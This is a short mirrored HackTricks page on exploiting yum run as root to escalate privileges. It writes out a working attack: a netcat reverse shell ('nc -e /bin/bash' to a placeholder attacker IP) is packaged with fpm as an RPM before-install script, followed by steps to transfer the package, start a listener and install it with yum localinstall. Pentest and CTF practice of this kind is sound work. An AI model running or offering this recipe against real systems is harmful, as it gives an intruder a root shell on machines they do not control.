mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
1.5 KiB
1.5 KiB
Exploiting Yum
Further examples around yum can also be found on gtfobins.
Executing arbitrary commands via RPM Packages
Checking the Environment
In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.
A working example of this vector
A working example of this exploit can be found in the daily bugle room on tryhackme.
Packing an RPM
In the following section, I will cover packaging a reverse shell into an RPM using fpm.
The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Catching a shell
Using the above example and assuming yum
can be executed as a higher-privileged user.
- Transfer the rpm to the host
- Start a listener on your local host such as the example netcat listener
- Install the vulnerable package
yum localinstall -y exploited-1.0-1.noarch.rpm